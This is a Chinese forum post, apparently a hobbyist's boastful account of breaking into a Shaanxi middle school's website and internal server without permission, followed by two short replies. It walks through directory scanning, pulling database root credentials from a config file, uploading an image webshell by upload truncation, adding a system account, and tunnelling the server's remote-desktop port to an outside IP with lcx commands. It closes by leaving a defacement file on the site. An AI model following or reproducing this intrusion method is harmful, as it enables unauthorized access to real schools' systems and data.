对陕西 一中学的渗透过程

admin

我不知道为什么  我觉得我对学校 有一种说不出的感觉  所以我才那么喜欢日学校网站..

我是怎么找到的学校网站 = =    我是乱找的..  


先看看后台 /admin.php  试试弱口令先   弱口令进不去......
然后..  操起御剑扫...    发现有个地方可以遍历目录    

翻遍了  好像没找到什么有用的东西...
回过头来  看看御剑扫出来了什么东西....
看到这个 我忍不住的说了声  日~....

麻痹 down啊....
因为是php的网站，我们拿到网站源码之后的思路有 ，看下有木有前辈留下的马， 找找有没有上传的页面 或者fck啥的
还有就是找 cofing 文件  看数据库连接的帐号 密码..

然后我们找到了  看到这个你想到了什么？  （数据库帐号是 root 然后等会可以用来提权 ）
先试试网站后台密码和数据库密码是不是一样的... 然后看到下面这个好激动  .....  真的好激动....


接下来就是啥？
接下来就是拿shell  看到这个编辑器  然后我第一反应就是 想到了  phpweb ...管他的 抓包再说..

可是各种抓包改包  不行啊..... 我失望了......
然后我发现 上传的图片的路径 有帐号名字.. 就像是这样的   upload/admin/pic/1.jpg     设想 如果把 admin 改成 1.php  路径就变成 upload/1.php/pic/1.jpg
然后我建立一个1.php的用户上传一个图片马试试


麻痹 不解析  后来  我开始紧张了 然后去看网站是什么环境..

麻痹的 阿帕奇.. 然后百度了阿帕奇的解析漏洞

但是 貌似要文件的名字是这个才能被解析...........然而 我这里能把路径变成这个...  我觉得应该不行 所以没试....
然后...后来慢慢翻 啊啊 啊啊啊...
最后看见一个上传点..我擦 我居然忽略了这个...  麻痹 我的钛合金什么眼怎么了  现在才看到 ....

然后用burp抓包 拿下了shell（抓包过程 和以前一样  截断就行..就没截图了）


然后上菜刀......搞了这么久  好累哦  ...

阿帕奇搭建的服务器 权限不解释  就连刚刚想到的 root 提权都没用上... 麻痹万恶的内网....
接下来 net ....  /add
根据经验..  内网服务器3389一般是开着而且是默认的...  因为管理员认为内网比较安全..

果然是这样....... 那么现在咋办呢.... 来个端口映射吧   可是我是内网 .... 我特么没外网的服务器  ...  我家路由器映射也不行啊（以前试过）
然后没办法了......

但是！最后 我徒弟给了我一个神器...

呵呵  就是把那个端口映射 我们把映射打开
ok ok ok  ok

那么现在的思路是    把服务器的3389 端口  映射到 118.193.131.219 这个ip的 1634端口
因为刚刚已经把118.193.131.219的1634端口映射到本机了
所以  118.193.131.219:1634 就等于 127.0.0.1:1634
说简单点  就是两次端口映射

我们先来本机监听
输入以下命令
mylcx -listen 1634 33891


那么我们现在上传一个  lcx 到服务器 输入以下命令 (我这个 lcx输入的命令和别的有区别...  是大神给我的免杀 lcx..)
lcx -slave 3389 118.193.131.219 1346

然后连接自己的 33891端口   127.0.0.1:33891


最后 找到网站路径 挂个 txt 路过

xunnun

上传截断从来就没好使过

为何不找一个外网的机子映射上去，然后直接远程登录它就可以了